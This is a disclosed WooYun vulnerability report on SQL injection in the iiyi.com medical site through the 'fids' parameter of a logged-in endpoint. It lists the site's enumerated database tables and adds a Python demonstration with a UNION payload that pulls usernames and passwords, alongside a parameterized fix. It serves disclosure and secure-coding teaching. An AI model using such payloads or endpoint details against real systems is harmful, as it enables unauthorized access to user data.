Vulnerability summary
Defect ID: wooyun-2015-0158083
Title: SQL injection on 爱爱医医学网 (iiyi.com)
Vendor: 爱爱医医学网
Author: んi_Stefen
Submitted: 2015-12-04 12:01
Fixed: 2016-01-18 15:20
Published: 2016-01-18 15:20
Vulnerability type: SQL injection
Severity: High
Self-rated Rank: 10
Status: confirmed by vendor
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-12-04: details sent to the vendor, awaiting vendor handling
2015-12-04: vendor confirmed; details visible to the vendor only
2015-12-14: details disclosed to core white hats and domain experts
2015-12-24: details disclosed to regular white hats
2016-01-03: details disclosed to intern white hats
2016-01-18: details disclosed to the public
Brief description:
SQL injection on 爱爱医医学网 (iiyi.com)
Detailed description:
Register any account at http://user.iiyi.com:80 and log in. The injection point is the authenticated endpoint user.iiyi.com/center/friend/get_relation, via the POST parameter fids (marked fids=* below, the sqlmap injection-marker notation). Because the endpoint only needs a self-registered login, any user of the site can reach it.
Proof of concept:
Database tables enumerated through the injection (the top of the listing is cut off in the report):
| case |
| advertise |
| advertise_static |
| app_access_detail |
| app_access_detail_2015_D |
| app_access_uuid |
| app_activety |
| app_counts |
| app_coupon |
| app_dbversion |
| app_login_faild |
| applica_content |
| applica_dbversion |
| applica_downdetial |
| applica_perdownload |
| applica_sort |
| band_records |
| base_area |
| base_hospital |
| bbs_sphinx |
| beans_order |
| case_admin |
| case_collection |
| case_comment |
| case_comment_support |
| case_icons |
| case_icons_log |
| case_images |
| case_myreply |
| case_noallow |
| company |
| dayly_news |
| disease_tags |
| disease_tags_bingli |
| disease_tags_case |
| disease_tags_collection |
| disease_tags_guide |
| disease_tags_look |
| disease_tags_news |
| disease_tags_posts |
| disease_tags_question |
| disease_tags_sous |
| disease_tags_topic |
| disease_tags_types |
| drug_action |
| drug_comp |
| drug_to_action |
| dynamic_0 |
| dynamic_aboutme_0 |
| dynamic_aboutme_1 |
| dynamic_aboutme_2 |
| dynamic_aboutme_3 |
| dynamic_aboutme_4 |
| dynamic_aboutme_5 |
| dynamic_aboutme_6 |
| dynamic_aboutme_7 |
| dynamic_aboutme_8 |
| dynamic_aboutme_9 |
| dynamic_autoid |
| dynamic_collection |
| dynamic_comment_0 |
| dynamic_friends_0 |
| dynamic_friends_1 |
| dynamic_friends_2 |
| dynamic_friends_3 |
| dynamic_friends_4 |
| dynamic_friends_5 |
| dynamic_friends_6 |
| dynamic_friends_7 |
| dynamic_friends_8 |
| dynamic_friends_9 |
| dynamic_images |
| dynamic_mine_0 |
| dynamic_mine_1 |
| dynamic_mine_2 |
| dynamic_mine_3 |
| dynamic_mine_4 |
| dynamic_mine_5 |
| dynamic_mine_6 |
| dynamic_mine_7 |
| dynamic_mine_8 |
| dynamic_mine_9 |
| dynamic_square |
| dynamic_tiny |
| euids |
| feedback |
| flash |
| flash_collection |
| flash_comment |
| flash_comment_support |
| flash_images |
| flash_sort |
| guide |
| guide_collection |
| home_access |
| hotmed |
| it_collect |
| it_comment |
| it_images |
| it_topic |
| literature |
| literature_sort |
| member_base |
| member_bbs_signin |
| member_beans_detial |
| member_beans_tran_log |
| member_black |
| member_certification |
| member_certification_ask |
| member_groups |
| member_image |
| member_invite_mobile |
| member_invitecode |
| member_perfection |
| member_relation |
| member_signin_detail |
| pms_detail |
| pms_relation |
| posts |
| site_var |
| sphinx_counter |
| sysnotice |
| sysnotice_mine_0 |
| sysnotice_mine_1 |
| sysnotice_mine_2 |
| sysnotice_mine_3 |
| sysnotice_mine_4 |
| sysnotice_mine_5 |
| sysnotice_mine_6 |
| sysnotice_mine_7 |
| sysnotice_mine_8 |
| sysnotice_mine_9 |
| thread_support |
| threads |
| topic |
| topic_collection |
| topic_comment |
| topic_comment_support |
| topic_images |
| topic_myreply |
| tupu |
| tupu_class |
| tupu_class_copy |
| tupu_class_type |
| tupu_copy |
| tupu_images |
+--------------------------+
There is a lot of data; I did not dump all of it.
Fix:
Filter the input: validate fids server-side as a bounded list of integer ids, and bind the values with parameterized queries instead of concatenating the raw POST value into the SQL statement.
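Added example, not code from the report or from iiyi.com: a minimal model of the get_relation handler described above, with the vulnerable string-splicing pattern next to the hardened version the fix section calls for. The schema is constructed for the demonstration (the table names member_relation and member_base are taken from the enumeration on this page, but their columns and rows are assumed), the handler shape and the payload are assumptions, and sqlite3 stands in for the site's real database.

```python
import re
import sqlite3

# Constructed sample data: table names borrowed from the dump on this page,
# columns and rows are assumed for illustration only.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE member_relation (uid INTEGER, fid INTEGER, relation TEXT);
        INSERT INTO member_relation VALUES (1, 2, 'friend'), (1, 3, 'blocked'), (9, 4, 'friend');
        CREATE TABLE member_base (uid INTEGER, username TEXT, password TEXT);
        INSERT INTO member_base VALUES (1, 'alice', 'hash_a'), (2, 'bob', 'hash_b');
    """)
    return conn

def get_relation_vulnerable(conn, uid, fids):
    """Vulnerable pattern (assumed): the raw POST value of fids is spliced into the IN list."""
    sql = (f"SELECT fid, relation FROM member_relation "
           f"WHERE uid = {int(uid)} AND fid IN ({fids})")
    return conn.execute(sql).fetchall()

_FID = re.compile(r"[1-9][0-9]{0,9}")  # positive integer id, bounded length

def parse_fids(fids, limit=100):
    """Whitelist the parameter: a non-empty, bounded, comma-separated list of integer ids."""
    parts = [p.strip() for p in fids.split(",")]
    if len(parts) > limit:
        raise ValueError("fids: too many ids")
    ids = []
    for p in parts:
        if not _FID.fullmatch(p):
            raise ValueError("fids: not an integer list")
        ids.append(int(p))
    return ids

def get_relation_safe(conn, uid, fids):
    """Hardened handler: validated ids, one bound placeholder per value, uid bound too."""
    ids = parse_fids(fids)
    placeholders = ",".join("?" * len(ids))
    sql = (f"SELECT fid, relation FROM member_relation "
           f"WHERE uid = ? AND fid IN ({placeholders})")
    return conn.execute(sql, [int(uid), *ids]).fetchall()

def is_rejected(conn, uid, fids):
    """True when the hardened handler refuses the value instead of querying with it."""
    try:
        get_relation_safe(conn, uid, fids)
        return False
    except ValueError:
        return True

# Constructed payload of the kind a tester would place at the fids=* marker:
# closes the IN list, widens the WHERE clause, and UNIONs in another table.
PAYLOAD = "0) OR 1=1 UNION SELECT username, password FROM member_base --"

if __name__ == "__main__":
    db = build_db()
    print("benign  :", get_relation_vulnerable(db, 1, "2,3"))
    print("injected:", get_relation_vulnerable(db, 1, PAYLOAD))
    print("hardened:", get_relation_safe(db, 1, "2,3"))
    print("rejected:", is_rejected(db, 1, PAYLOAD))
```

The vulnerable handler returns the friend rows for a benign "2,3" but, given the payload, also returns rows from member_base, which is the class of leak the table enumeration above demonstrates. The hardened handler answers the benign request identically and rejects the payload before any SQL is built; the integer whitelist is what makes the placeholder count safe to compute from the input.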
Copyright notice: when reposting, credit the source as んi_Stefen@WooYun
Vulnerability response
Vendor response:
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-12-04 15:17
Vendor reply:
Thanks, confirmed; we have assigned someone to handle it.
Latest status:
None